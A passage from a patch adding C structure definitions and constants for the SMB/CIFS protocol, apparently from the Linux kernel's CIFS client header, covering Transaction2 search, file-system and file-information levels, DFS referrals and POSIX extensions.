++typedef struct smb_com_transaction2_ffirst_rsp {
++	struct smb_hdr hdr;	/* wct = 10 */
++	struct trans2_resp t2;
++	__u16 ByteCount;
++} __attribute__((packed)) TRANSACTION2_FFIRST_RSP;
++
++typedef struct smb_com_transaction2_ffirst_rsp_parms {
++	__u16 SearchHandle;
++	__le16 SearchCount;
++	__le16 EndofSearch;
++	__le16 EAErrorOffset;
++	__le16 LastNameOffset;
++} __attribute__((packed)) T2_FFIRST_RSP_PARMS;
++
++typedef struct smb_com_transaction2_fnext_req {
++	struct smb_hdr hdr;	/* wct = 15 */
++	__le16 TotalParameterCount;
++	__le16 TotalDataCount;
++	__le16 MaxParameterCount;
++	__le16 MaxDataCount;
++	__u8 MaxSetupCount;
++	__u8 Reserved;
++	__le16 Flags;
++	__le32 Timeout;
++	__u16 Reserved2;
++	__le16 ParameterCount;
++	__le16 ParameterOffset;
++	__le16 DataCount;
++	__le16 DataOffset;
++	__u8 SetupCount;	/* one */
++	__u8 Reserved3;
++	__le16 SubCommand;	/* TRANS2_FIND_NEXT */
++	__le16 ByteCount;
++	__u8 Pad;
++	__u16 SearchHandle;
++	__le16 SearchCount;
++	__le16 InformationLevel;
++	__u32 ResumeKey;
++	__le16 SearchFlags;
++	char ResumeFileName[];
++} __attribute__((packed)) TRANSACTION2_FNEXT_REQ;
++
++typedef struct smb_com_transaction2_fnext_rsp {
++	struct smb_hdr hdr;	/* wct = 10 */
++	struct trans2_resp t2;
++	__u16 ByteCount;
++} __attribute__((packed)) TRANSACTION2_FNEXT_RSP;
++
++typedef struct smb_com_transaction2_fnext_rsp_parms {
++	__le16 SearchCount;
++	__le16 EndofSearch;
++	__le16 EAErrorOffset;
++	__le16 LastNameOffset;
++} __attribute__((packed)) T2_FNEXT_RSP_PARMS;
++
++/* QFSInfo Levels */
++#define SMB_INFO_ALLOCATION         1
++#define SMB_INFO_VOLUME             2
++#define SMB_QUERY_FS_VOLUME_INFO    0x102
++#define SMB_QUERY_FS_SIZE_INFO      0x103
++#define SMB_QUERY_FS_DEVICE_INFO    0x104
++#define SMB_QUERY_FS_ATTRIBUTE_INFO 0x105
++#define SMB_QUERY_CIFS_UNIX_INFO    0x200
++#define SMB_QUERY_POSIX_FS_INFO     0x201
++#define SMB_QUERY_POSIX_WHO_AM_I    0x202
++#define SMB_REQUEST_TRANSPORT_ENCRYPTION 0x203
++#define SMB_QUERY_FS_PROXY          0x204 /* WAFS enabled. Returns structure
++					    FILE_SYSTEM__UNIX_INFO to tell
++					    whether new NTIOCTL available
++					    (0xACE) for WAN friendly SMB
++					    operations to be carried */
++#define SMB_QUERY_LABEL_INFO        0x3ea
++#define SMB_QUERY_FS_QUOTA_INFO     0x3ee
++#define SMB_QUERY_FS_FULL_SIZE_INFO 0x3ef
++#define SMB_QUERY_OBJECTID_INFO     0x3f0
++
++typedef struct smb_com_transaction2_qfsi_req {
++	struct smb_hdr hdr;	/* wct = 14+ */
++	__le16 TotalParameterCount;
++	__le16 TotalDataCount;
++	__le16 MaxParameterCount;
++	__le16 MaxDataCount;
++	__u8 MaxSetupCount;
++	__u8 Reserved;
++	__le16 Flags;
++	__le32 Timeout;
++	__u16 Reserved2;
++	__le16 ParameterCount;
++	__le16 ParameterOffset;
++	__le16 DataCount;
++	__le16 DataOffset;
++	__u8 SetupCount;
++	__u8 Reserved3;
++	__le16 SubCommand;	/* one setup word */
++	__le16 ByteCount;
++	__u8 Pad;
++	__le16 InformationLevel;
++} __attribute__((packed)) TRANSACTION2_QFSI_REQ;
++
++typedef struct smb_com_transaction_qfsi_rsp {
++	struct smb_hdr hdr;	/* wct = 10 + SetupCount */
++	struct trans2_resp t2;
++	__u16 ByteCount;
++	__u8 Pad;	/* may be three bytes? *//* followed by data area */
++} __attribute__((packed)) TRANSACTION2_QFSI_RSP;
++
++typedef struct whoami_rsp_data { /* Query level 0x202 */
++	__u32 flags; /* 0 = Authenticated user 1 = GUEST */
++	__u32 mask; /* which flags bits server understands ie 0x0001 */
++	__u64 unix_user_id;
++	__u64 unix_user_gid;
++	__u32 number_of_supplementary_gids; /* may be zero */
++	__u32 number_of_sids; /* may be zero */
++	__u32 length_of_sid_array; /* in bytes - may be zero */
++	__u32 pad; /* reserved - MBZ */
++	/* __u64 gid_array[0]; */  /* may be empty */
++	/* __u8 * psid_list */  /* may be empty */
++} __attribute__((packed)) WHOAMI_RSP_DATA;
++
++/* SETFSInfo Levels */
++#define SMB_SET_CIFS_UNIX_INFO    0x200
++/* level 0x203 is defined above in list of QFS info levels */
++/* #define SMB_REQUEST_TRANSPORT_ENCRYPTION 0x203 */
++
++/* Level 0x200 request structure follows */
++typedef struct smb_com_transaction2_setfsi_req {
++	struct smb_hdr hdr;	/* wct = 15 */
++	__le16 TotalParameterCount;
++	__le16 TotalDataCount;
++	__le16 MaxParameterCount;
++	__le16 MaxDataCount;
++	__u8 MaxSetupCount;
++	__u8 Reserved;
++	__le16 Flags;
++	__le32 Timeout;
++	__u16 Reserved2;
++	__le16 ParameterCount;	/* 4 */
++	__le16 ParameterOffset;
++	__le16 DataCount;	/* 12 */
++	__le16 DataOffset;
++	__u8 SetupCount;	/* one */
++	__u8 Reserved3;
++	__le16 SubCommand;	/* TRANS2_SET_FS_INFORMATION */
++	__le16 ByteCount;
++	__u8 Pad;
++	__u16 FileNum;		/* Parameters start. */
++	__le16 InformationLevel;/* Parameters end. */
++	__le16 ClientUnixMajor; /* Data start. */
++	__le16 ClientUnixMinor;
++	__le64 ClientUnixCap;   /* Data end */
++} __attribute__((packed)) TRANSACTION2_SETFSI_REQ;
++
++/* level 0x203 request structure follows */
++typedef struct smb_com_transaction2_setfs_enc_req {
++	struct smb_hdr hdr;	/* wct = 15 */
++	__le16 TotalParameterCount;
++	__le16 TotalDataCount;
++	__le16 MaxParameterCount;
++	__le16 MaxDataCount;
++	__u8 MaxSetupCount;
++	__u8 Reserved;
++	__le16 Flags;
++	__le32 Timeout;
++	__u16 Reserved2;
++	__le16 ParameterCount;	/* 4 */
++	__le16 ParameterOffset;
++	__le16 DataCount;	/* 12 */
++	__le16 DataOffset;
++	__u8 SetupCount;	/* one */
++	__u8 Reserved3;
++	__le16 SubCommand;	/* TRANS2_SET_FS_INFORMATION */
++	__le16 ByteCount;
++	__u8 Pad;
++	__u16  Reserved4;	/* Parameters start. */
++	__le16 InformationLevel;/* Parameters end. */
++	/* NTLMSSP Blob, Data start. */
++} __attribute__((packed)) TRANSACTION2_SETFSI_ENC_REQ;
++
++/* response for setfsinfo levels 0x200 and 0x203 */
++typedef struct smb_com_transaction2_setfsi_rsp {
++	struct smb_hdr hdr;	/* wct = 10 */
++	struct trans2_resp t2;
++	__u16 ByteCount;
++} __attribute__((packed)) TRANSACTION2_SETFSI_RSP;
++
++typedef struct smb_com_transaction2_get_dfs_refer_req {
++	struct smb_hdr hdr;	/* wct = 15 */
++	__le16 TotalParameterCount;
++	__le16 TotalDataCount;
++	__le16 MaxParameterCount;
++	__le16 MaxDataCount;
++	__u8 MaxSetupCount;
++	__u8 Reserved;
++	__le16 Flags;
++	__le32 Timeout;
++	__u16 Reserved2;
++	__le16 ParameterCount;
++	__le16 ParameterOffset;
++	__le16 DataCount;
++	__le16 DataOffset;
++	__u8 SetupCount;
++	__u8 Reserved3;
++	__le16 SubCommand;	/* one setup word */
++	__le16 ByteCount;
++	__u8 Pad[3];		/* Win2K has sent 0x0F01 (max response length
++				   perhaps?) followed by one byte pad - doesn't
++				   seem to matter though */
++	__le16 MaxReferralLevel;
++	char RequestFileName[1];
++} __attribute__((packed)) TRANSACTION2_GET_DFS_REFER_REQ;
++
++#define DFS_VERSION cpu_to_le16(0x0003)
++
++/* DFS server target type */
++#define DFS_TYPE_LINK 0x0000  /* also for sysvol targets */
++#define DFS_TYPE_ROOT 0x0001
++
++/* Referral Entry Flags */
++#define DFS_NAME_LIST_REF 0x0200 /* set for domain or DC referral responses */
++#define DFS_TARGET_SET_BOUNDARY 0x0400 /* only valid with version 4 dfs req */
++
++typedef struct dfs_referral_level_3 { /* version 4 is same, + one flag bit */
++	__le16 VersionNumber;  /* must be 3 or 4 */
++	__le16 Size;
++	__le16 ServerType; /* 0x0001 = root targets; 0x0000 = link targets */
++	__le16 ReferralEntryFlags;
++	__le32 TimeToLive;
++	__le16 DfsPathOffset;
++	__le16 DfsAlternatePathOffset;
++	__le16 NetworkAddressOffset; /* offset of the link target */
++	__u8   ServiceSiteGuid[16];  /* MBZ, ignored */
++} __attribute__((packed)) REFERRAL3;
++
++struct get_dfs_referral_rsp {
++	__le16 PathConsumed;
++	__le16 NumberOfReferrals;
++	__le32 DFSFlags;
++	REFERRAL3 referrals[1];	/* array of level 3 dfs_referral structures */
++	/* followed by the strings pointed to by the referral structures */
++} __packed;
++
++typedef struct smb_com_transaction_get_dfs_refer_rsp {
++	struct smb_hdr hdr;	/* wct = 10 */
++	struct trans2_resp t2;
++	__u16 ByteCount;
++	__u8 Pad;
++	struct get_dfs_referral_rsp dfs_data;
++} __packed TRANSACTION2_GET_DFS_REFER_RSP;
++
++/* DFS Flags */
++#define DFSREF_REFERRAL_SERVER  0x00000001 /* all targets are DFS roots */
++#define DFSREF_STORAGE_SERVER   0x00000002 /* no further ref requests needed */
++#define DFSREF_TARGET_FAILBACK  0x00000004 /* only for DFS referral version 4 */
++
++/*
++ ************************************************************************
++ * All structs for everything above the SMB PDUs themselves
++ * (such as the T2 level specific data) go here
++ ************************************************************************
++ */
++
++/*
++ * Information on a server
++ */
++
++struct serverInfo {
++	char name[16];
++	unsigned char versionMajor;
++	unsigned char versionMinor;
++	unsigned long type;
++	unsigned int commentOffset;
++} __attribute__((packed));
++
++/*
++ * The following structure is the format of the data returned on a NetShareEnum
++ * with level "90" (x5A)
++ */
++
++struct shareInfo {
++	char shareName[13];
++	char pad;
++	unsigned short type;
++	unsigned int commentOffset;
++} __attribute__((packed));
++
++struct aliasInfo {
++	char aliasName[9];
++	char pad;
++	unsigned int commentOffset;
++	unsigned char type[2];
++} __attribute__((packed));
++
++struct aliasInfo92 {
++	int aliasNameOffset;
++	int serverNameOffset;
++	int shareNameOffset;
++} __attribute__((packed));
++
++typedef struct {
++	__le64 TotalAllocationUnits;
++	__le64 FreeAllocationUnits;
++	__le32 SectorsPerAllocationUnit;
++	__le32 BytesPerSector;
++} __attribute__((packed)) FILE_SYSTEM_INFO;	/* size info, level 0x103 */
++
++typedef struct {
++	__le32 fsid;
++	__le32 SectorsPerAllocationUnit;
++	__le32 TotalAllocationUnits;
++	__le32 FreeAllocationUnits;
++	__le16  BytesPerSector;
++} __attribute__((packed)) FILE_SYSTEM_ALLOC_INFO;
++
++typedef struct {
++	__le16 MajorVersionNumber;
++	__le16 MinorVersionNumber;
++	__le64 Capability;
++} __attribute__((packed)) FILE_SYSTEM_UNIX_INFO; /* Unix extension level 0x200*/
++
++/* Version numbers for CIFS UNIX major and minor. */
++#define CIFS_UNIX_MAJOR_VERSION 1
++#define CIFS_UNIX_MINOR_VERSION 0
++
++/* Linux/Unix extensions capability flags */
++#define CIFS_UNIX_FCNTL_CAP             0x00000001 /* support for fcntl locks */
++#define CIFS_UNIX_POSIX_ACL_CAP         0x00000002 /* support getfacl/setfacl */
++#define CIFS_UNIX_XATTR_CAP             0x00000004 /* support new namespace   */
++#define CIFS_UNIX_EXTATTR_CAP           0x00000008 /* support chattr/chflag   */
++#define CIFS_UNIX_POSIX_PATHNAMES_CAP   0x00000010 /* Allow POSIX path chars  */
++#define CIFS_UNIX_POSIX_PATH_OPS_CAP    0x00000020 /* Allow new POSIX path based
++						      calls including posix open
++						      and posix unlink */
++#define CIFS_UNIX_LARGE_READ_CAP        0x00000040 /* support reads >128K (up
++						      to 0xFFFF00 */
++#define CIFS_UNIX_LARGE_WRITE_CAP       0x00000080
++#define CIFS_UNIX_TRANSPORT_ENCRYPTION_CAP 0x00000100 /* can do SPNEGO crypt */
++#define CIFS_UNIX_TRANSPORT_ENCRYPTION_MANDATORY_CAP  0x00000200 /* must do  */
++#define CIFS_UNIX_PROXY_CAP             0x00000400 /* Proxy cap: 0xACE ioctl and
++						      QFS PROXY call */
++#ifdef CONFIG_CIFS_POSIX
++/* presumably don't need the 0x20 POSIX_PATH_OPS_CAP since we never send
++   LockingX instead of posix locking call on unix sess (and we do not expect
++   LockingX to use different (ie Windows) semantics than posix locking on
++   the same session (if WINE needs to do this later, we can add this cap
++   back in later */
++/* #define CIFS_UNIX_CAP_MASK              0x000000fb */
++#define CIFS_UNIX_CAP_MASK              0x000003db
++#else
++#define CIFS_UNIX_CAP_MASK              0x00000013
++#endif /* CONFIG_CIFS_POSIX */
++
++
++#define CIFS_POSIX_EXTENSIONS           0x00000010 /* support for new QFSInfo */
++
++typedef struct {
++	/* For undefined recommended transfer size return -1 in that field */
++	__le32 OptimalTransferSize;  /* bsize on some os, iosize on other os */
++	__le32 BlockSize;
++    /* The next three fields are in terms of the block size.
++	(above). If block size is unknown, 4096 would be a
++	reasonable block size for a server to report.
++	Note that returning the blocks/blocksavail removes need
++	to make a second call (to QFSInfo level 0x103 to get this info.
++	UserBlockAvail is typically less than or equal to BlocksAvail,
++	if no distinction is made return the same value in each */
++	__le64 TotalBlocks;
++	__le64 BlocksAvail;       /* bfree */
++	__le64 UserBlocksAvail;   /* bavail */
++    /* For undefined Node fields or FSID return -1 */
++	__le64 TotalFileNodes;
++	__le64 FreeFileNodes;
++	__le64 FileSysIdentifier;   /* fsid */
++	/* NB Namelen comes from FILE_SYSTEM_ATTRIBUTE_INFO call */
++	/* NB flags can come from FILE_SYSTEM_DEVICE_INFO call   */
++} __attribute__((packed)) FILE_SYSTEM_POSIX_INFO;
++
++/* DeviceType Flags */
++#define FILE_DEVICE_CD_ROM              0x00000002
++#define FILE_DEVICE_CD_ROM_FILE_SYSTEM  0x00000003
++#define FILE_DEVICE_DFS                 0x00000006
++#define FILE_DEVICE_DISK                0x00000007
++#define FILE_DEVICE_DISK_FILE_SYSTEM    0x00000008
++#define FILE_DEVICE_FILE_SYSTEM         0x00000009
++#define FILE_DEVICE_NAMED_PIPE          0x00000011
++#define FILE_DEVICE_NETWORK             0x00000012
++#define FILE_DEVICE_NETWORK_FILE_SYSTEM 0x00000014
++#define FILE_DEVICE_NULL                0x00000015
++#define FILE_DEVICE_PARALLEL_PORT       0x00000016
++#define FILE_DEVICE_PRINTER             0x00000018
++#define FILE_DEVICE_SERIAL_PORT         0x0000001b
++#define FILE_DEVICE_STREAMS             0x0000001e
++#define FILE_DEVICE_TAPE                0x0000001f
++#define FILE_DEVICE_TAPE_FILE_SYSTEM    0x00000020
++#define FILE_DEVICE_VIRTUAL_DISK        0x00000024
++#define FILE_DEVICE_NETWORK_REDIRECTOR  0x00000028
++
++/* Device Characteristics */
++#define FILE_REMOVABLE_MEDIA			0x00000001
++#define FILE_READ_ONLY_DEVICE			0x00000002
++#define FILE_FLOPPY_DISKETTE			0x00000004
++#define FILE_WRITE_ONCE_MEDIA			0x00000008
++#define FILE_REMOTE_DEVICE			0x00000010
++#define FILE_DEVICE_IS_MOUNTED			0x00000020
++#define FILE_VIRTUAL_VOLUME			0x00000040
++#define FILE_DEVICE_SECURE_OPEN			0x00000100
++#define FILE_CHARACTERISTIC_TS_DEVICE		0x00001000
++#define FILE_CHARACTERISTIC_WEBDAV_DEVICE	0x00002000
++#define FILE_PORTABLE_DEVICE			0x00004000
++#define FILE_DEVICE_ALLOW_APPCONTAINER_TRAVERSAL 0x00020000
++
++typedef struct {
++	__le32 DeviceType;
++	__le32 DeviceCharacteristics;
++} __attribute__((packed)) FILE_SYSTEM_DEVICE_INFO; /* device info level 0x104 */
++
++/* minimum includes first three fields, and empty FS Name */
++#define MIN_FS_ATTR_INFO_SIZE 12
++
++
++/* List of FileSystemAttributes - see 2.5.1 of MS-FSCC */
++#define FILE_SUPPORTS_SPARSE_VDL	0x10000000 /* faster nonsparse extend */
++#define FILE_SUPPORTS_BLOCK_REFCOUNTING	0x08000000 /* allow ioctl dup extents */
++#define FILE_SUPPORT_INTEGRITY_STREAMS	0x04000000
++#define FILE_SUPPORTS_USN_JOURNAL	0x02000000
++#define FILE_SUPPORTS_OPEN_BY_FILE_ID	0x01000000
++#define FILE_SUPPORTS_EXTENDED_ATTRIBUTES 0x00800000
++#define FILE_SUPPORTS_HARD_LINKS	0x00400000
++#define FILE_SUPPORTS_TRANSACTIONS	0x00200000
++#define FILE_SEQUENTIAL_WRITE_ONCE	0x00100000
++#define FILE_READ_ONLY_VOLUME		0x00080000
++#define FILE_NAMED_STREAMS		0x00040000
++#define FILE_SUPPORTS_ENCRYPTION	0x00020000
++#define FILE_SUPPORTS_OBJECT_IDS	0x00010000
++#define FILE_VOLUME_IS_COMPRESSED	0x00008000
++#define FILE_SUPPORTS_REMOTE_STORAGE	0x00000100
++#define FILE_SUPPORTS_REPARSE_POINTS	0x00000080
++#define FILE_SUPPORTS_SPARSE_FILES	0x00000040
++#define FILE_VOLUME_QUOTAS		0x00000020
++#define FILE_FILE_COMPRESSION		0x00000010
++#define FILE_PERSISTENT_ACLS		0x00000008
++#define FILE_UNICODE_ON_DISK		0x00000004
++#define FILE_CASE_PRESERVED_NAMES	0x00000002
++#define FILE_CASE_SENSITIVE_SEARCH	0x00000001
++typedef struct {
++	__le32 Attributes;
++	__le32 MaxPathNameComponentLength;
++	__le32 FileSystemNameLen;
++	char FileSystemName[52]; /* do not have to save this - get subset? */
++} __attribute__((packed)) FILE_SYSTEM_ATTRIBUTE_INFO;
++
++/******************************************************************************/
++/* QueryFileInfo/QueryPathinfo (also for SetPath/SetFile) data buffer formats */
++/******************************************************************************/
++typedef struct { /* data block encoding of response to level 263 QPathInfo */
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le32 Attributes;
++	__u32 Pad1;
++	__le64 AllocationSize;
++	__le64 EndOfFile;	/* size ie offset to first free byte in file */
++	__le32 NumberOfLinks;	/* hard links */
++	__u8 DeletePending;
++	__u8 Directory;
++	__u16 Pad2;
++	__le64 IndexNumber;
++	__le32 EASize;
++	__le32 AccessFlags;
++	__u64 IndexNumber1;
++	__le64 CurrentByteOffset;
++	__le32 Mode;
++	__le32 AlignmentRequirement;
++	__le32 FileNameLength;
++	char FileName[1];
++} __attribute__((packed)) FILE_ALL_INFO;	/* level 0x107 QPathInfo */
++
++typedef struct {
++	__le64 AllocationSize;
++	__le64 EndOfFile;	/* size ie offset to first free byte in file */
++	__le32 NumberOfLinks;	/* hard links */
++	__u8 DeletePending;
++	__u8 Directory;
++	__u16 Pad;
++} __attribute__((packed)) FILE_STANDARD_INFO;	/* level 0x102 QPathInfo */
++
++
++/* defines for enumerating possible values of the Unix type field below */
++#define UNIX_FILE      0
++#define UNIX_DIR       1
++#define UNIX_SYMLINK   2
++#define UNIX_CHARDEV   3
++#define UNIX_BLOCKDEV  4
++#define UNIX_FIFO      5
++#define UNIX_SOCKET    6
++typedef struct {
++	__le64 EndOfFile;
++	__le64 NumOfBytes;
++	__le64 LastStatusChange; /*SNIA specs DCE time for the 3 time fields */
++	__le64 LastAccessTime;
++	__le64 LastModificationTime;
++	__le64 Uid;
++	__le64 Gid;
++	__le32 Type;
++	__le64 DevMajor;
++	__le64 DevMinor;
++	__le64 UniqueId;
++	__le64 Permissions;
++	__le64 Nlinks;
++} __attribute__((packed)) FILE_UNIX_BASIC_INFO;	/* level 0x200 QPathInfo */
++
++typedef struct {
++	char LinkDest[1];
++} __attribute__((packed)) FILE_UNIX_LINK_INFO;	/* level 0x201 QPathInfo */
++
++/* The following three structures are needed only for
++	setting time to NT4 and some older servers via
++	the primitive DOS time format */
++typedef struct {
++	__u16 Day:5;
++	__u16 Month:4;
++	__u16 Year:7;
++} __attribute__((packed)) SMB_DATE;
++
++typedef struct {
++	__u16 TwoSeconds:5;
++	__u16 Minutes:6;
++	__u16 Hours:5;
++} __attribute__((packed)) SMB_TIME;
++
++typedef struct {
++	__le16 CreationDate; /* SMB Date see above */
++	__le16 CreationTime; /* SMB Time */
++	__le16 LastAccessDate;
++	__le16 LastAccessTime;
++	__le16 LastWriteDate;
++	__le16 LastWriteTime;
++	__le32 DataSize; /* File Size (EOF) */
++	__le32 AllocationSize;
++	__le16 Attributes; /* verify not u32 */
++	__le32 EASize;
++} __attribute__((packed)) FILE_INFO_STANDARD;  /* level 1 SetPath/FileInfo */
++
++typedef struct {
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le32 Attributes;
++	__u32 Pad;
++} __attribute__((packed)) FILE_BASIC_INFO;	/* size info, level 0x101 */
++
++struct file_allocation_info {
++	__le64 AllocationSize; /* Note old Samba srvr rounds this up too much */
++} __attribute__((packed));	/* size used on disk, for level 0x103 for set,
++				   0x105 for query */
++
++struct file_end_of_file_info {
++	__le64 FileSize;		/* offset to end of file */
++} __attribute__((packed)); /* size info, level 0x104 for set, 0x106 for query */
++
++struct file_alt_name_info {
++	__u8   alt_name[1];
++} __attribute__((packed));      /* level 0x0108 */
++
++struct file_stream_info {
++	__le32 number_of_streams;  /* BB check sizes and verify location */
++	/* followed by info on streams themselves
++		u64 size;
++		u64 allocation_size
++		stream info */
++};      /* level 0x109 */
++
++struct file_compression_info {
++	__le64 compressed_size;
++	__le16 format;
++	__u8   unit_shift;
++	__u8   ch_shift;
++	__u8   cl_shift;
++	__u8   pad[3];
++} __attribute__((packed));      /* level 0x10b */
++
++/* POSIX ACL set/query path info structures */
++#define CIFS_ACL_VERSION 1
++struct cifs_posix_ace { /* access control entry (ACE) */
++	__u8  cifs_e_tag;
++	__u8  cifs_e_perm;
++	__le64 cifs_uid; /* or gid */
++} __attribute__((packed));
++
++struct cifs_posix_acl { /* access conrol list  (ACL) */
++	__le16	version;
++	__le16	access_entry_count;  /* access ACL - count of entries */
++	__le16	default_entry_count; /* default ACL - count of entries */
++	struct cifs_posix_ace ace_array[];
++	/* followed by
++	struct cifs_posix_ace default_ace_arraay[] */
++} __attribute__((packed));  /* level 0x204 */
++
++/* types of access control entries already defined in posix_acl.h */
++/* #define CIFS_POSIX_ACL_USER_OBJ	 0x01
++#define CIFS_POSIX_ACL_USER      0x02
++#define CIFS_POSIX_ACL_GROUP_OBJ 0x04
++#define CIFS_POSIX_ACL_GROUP     0x08
++#define CIFS_POSIX_ACL_MASK      0x10
++#define CIFS_POSIX_ACL_OTHER     0x20 */
++
++/* types of perms */
++/* #define CIFS_POSIX_ACL_EXECUTE   0x01
++#define CIFS_POSIX_ACL_WRITE     0x02
++#define CIFS_POSIX_ACL_READ	     0x04 */
++
++/* end of POSIX ACL definitions */
++
++/* POSIX Open Flags */
++#define SMB_O_RDONLY 	 0x1
++#define SMB_O_WRONLY 	0x2
++#define SMB_O_RDWR 	0x4
++#define SMB_O_CREAT 	0x10
++#define SMB_O_EXCL 	0x20
++#define SMB_O_TRUNC 	0x40
++#define SMB_O_APPEND 	0x80
++#define SMB_O_SYNC 	0x100
++#define SMB_O_DIRECTORY 0x200
++#define SMB_O_NOFOLLOW 	0x400
++#define SMB_O_DIRECT 	0x800
++
++typedef struct {
++	__le32 OpenFlags; /* same as NT CreateX */
++	__le32 PosixOpenFlags;
++	__le64 Permissions;
++	__le16 Level; /* reply level requested (see QPathInfo levels) */
++} __attribute__((packed)) OPEN_PSX_REQ; /* level 0x209 SetPathInfo data */
++
++typedef struct {
++	__le16 OplockFlags;
++	__u16 Fid;
++	__le32 CreateAction;
++	__le16 ReturnedLevel;
++	__le16 Pad;
++	/* struct following varies based on requested level */
++} __attribute__((packed)) OPEN_PSX_RSP; /* level 0x209 SetPathInfo data */
++
++#define SMB_POSIX_UNLINK_FILE_TARGET		0
++#define SMB_POSIX_UNLINK_DIRECTORY_TARGET	1
++
++struct unlink_psx_rq { /* level 0x20a SetPathInfo */
++	__le16 type;
++} __attribute__((packed));
++
++struct file_internal_info {
++	__le64  UniqueId; /* inode number */
++} __attribute__((packed));      /* level 0x3ee */
++
++struct file_mode_info {
++	__le32	Mode;
++} __attribute__((packed));      /* level 0x3f8 */
++
++struct file_attrib_tag {
++	__le32 Attribute;
++	__le32 ReparseTag;
++} __attribute__((packed));      /* level 0x40b */
++
++
++/********************************************************/
++/*  FindFirst/FindNext transact2 data buffer formats    */
++/********************************************************/
++
++typedef struct {
++	__le32 NextEntryOffset;
++	__u32 ResumeKey; /* as with FileIndex - no need to convert */
++	FILE_UNIX_BASIC_INFO basic;
++	char FileName[1];
++} __attribute__((packed)) FILE_UNIX_INFO; /* level 0x202 */
++
++typedef struct {
++	__le32 NextEntryOffset;
++	__u32 FileIndex;
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le64 EndOfFile;
++	__le64 AllocationSize;
++	__le32 ExtFileAttributes;
++	__le32 FileNameLength;
++	char FileName[1];
++} __attribute__((packed)) FILE_DIRECTORY_INFO;   /* level 0x101 FF resp data */
++
++typedef struct {
++	__le32 NextEntryOffset;
++	__u32 FileIndex;
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le64 EndOfFile;
++	__le64 AllocationSize;
++	__le32 ExtFileAttributes;
++	__le32 FileNameLength;
++	__le32 EaSize; /* length of the xattrs */
++	char FileName[1];
++} __attribute__((packed)) FILE_FULL_DIRECTORY_INFO; /* level 0x102 rsp data */
++
++typedef struct {
++	__le32 NextEntryOffset;
++	__u32 FileIndex;
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le64 EndOfFile;
++	__le64 AllocationSize;
++	__le32 ExtFileAttributes;
++	__le32 FileNameLength;
++	__le32 EaSize; /* EA size */
++	__le32 Reserved;
++	__le64 UniqueId; /* inode num - le since Samba puts ino in low 32 bit*/
++	char FileName[1];
++} __attribute__((packed)) SEARCH_ID_FULL_DIR_INFO; /* level 0x105 FF rsp data */
++
++typedef struct {
++	__le32 NextEntryOffset;
++	__u32 FileIndex;
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le64 EndOfFile;
++	__le64 AllocationSize;
++	__le32 ExtFileAttributes;
++	__le32 FileNameLength;
++	__le32 EaSize; /* length of the xattrs */
++	__u8   ShortNameLength;
++	__u8   Reserved;
++	__u8   ShortName[24];
++	char FileName[1];
++} __attribute__((packed)) FILE_BOTH_DIRECTORY_INFO; /* level 0x104 FFrsp data */
++
++typedef struct {
++	__u32  ResumeKey;
++	__le16 CreationDate; /* SMB Date */
++	__le16 CreationTime; /* SMB Time */
++	__le16 LastAccessDate;
++	__le16 LastAccessTime;
++	__le16 LastWriteDate;
++	__le16 LastWriteTime;
++	__le32 DataSize; /* File Size (EOF) */
++	__le32 AllocationSize;
++	__le16 Attributes; /* verify not u32 */
++	__u8   FileNameLength;
++	char FileName[1];
++} __attribute__((packed)) FIND_FILE_STANDARD_INFO; /* level 0x1 FF resp data */
++
++
++struct win_dev {
++	unsigned char type[8]; /* IntxCHR or IntxBLK */
++	__le64 major;
++	__le64 minor;
++} __attribute__((packed));
++
++struct gea {
++	unsigned char name_len;
++	char name[1];
++} __attribute__((packed));
++
++struct gealist {
++	unsigned long list_len;
++	struct gea list[1];
++} __attribute__((packed));
++
++struct fea {
++	unsigned char EA_flags;
++	__u8 name_len;
++	__le16 value_len;
++	char name[1];
++	/* optionally followed by value */
++} __attribute__((packed));
++/* flags for _FEA.fEA */
++#define FEA_NEEDEA         0x80	/* need EA bit */
++
++struct fealist {
++	__le32 list_len;
++	struct fea list[1];
++} __attribute__((packed));
++
++/* used to hold an arbitrary blob of data */
++struct data_blob {
++	__u8 *data;
++	size_t length;
++	void (*free) (struct data_blob *data_blob);
++} __attribute__((packed));
++
++
++#ifdef CONFIG_CIFS_POSIX
++/*
++	For better POSIX semantics from Linux client, (even better
++	than the existing CIFS Unix Extensions) we need updated PDUs for:
++
++	1) PosixCreateX - to set and return the mode, inode#, device info and
++	perhaps add a CreateDevice - to create Pipes and other special .inodes
++	Also note POSIX open flags
++	2) Close - to return the last write time to do cache across close
++		more safely
++	3) FindFirst return unique inode number - what about resume key, two
++	forms short (matches readdir) and full (enough info to cache inodes)
++	4) Mkdir - set mode
++
++	And under consideration:
++	5) FindClose2 (return nanosecond timestamp ??)
++	6) Use nanosecond timestamps throughout all time fields if
++	   corresponding attribute flag is set
++	7) sendfile - handle based copy
++
++	what about fixing 64 bit alignment
++
++	There are also various legacy SMB/CIFS requests used as is
++
++	From existing Lanman and NTLM dialects:
++	--------------------------------------
++	NEGOTIATE
++	SESSION_SETUP_ANDX (BB which?)
++	TREE_CONNECT_ANDX (BB which wct?)
++	TREE_DISCONNECT (BB add volume timestamp on response)
++	LOGOFF_ANDX
++	DELETE (note delete open file behavior)
++	DELETE_DIRECTORY
++	READ_AND_X
++	WRITE_AND_X
++	LOCKING_AND_X (note posix lock semantics)
++	RENAME (note rename across dirs and open file rename posix behaviors)
++	NT_RENAME (for hardlinks) Is this good enough for all features?
++	FIND_CLOSE2
++	TRANSACTION2 (18 cases)
++		SMB_SET_FILE_END_OF_FILE_INFO2 SMB_SET_PATH_END_OF_FILE_INFO2
++		(BB verify that never need to set allocation size)
++		SMB_SET_FILE_BASIC_INFO2 (setting times - BB can it be done via
++			 Unix ext?)
++
++	COPY (note support for copy across directories) - FUTURE, OPTIONAL
++	setting/getting OS/2 EAs - FUTURE (BB can this handle
++	setting Linux xattrs perfectly)         - OPTIONAL
++	dnotify                                 - FUTURE, OPTIONAL
++	quota                                   - FUTURE, OPTIONAL
++
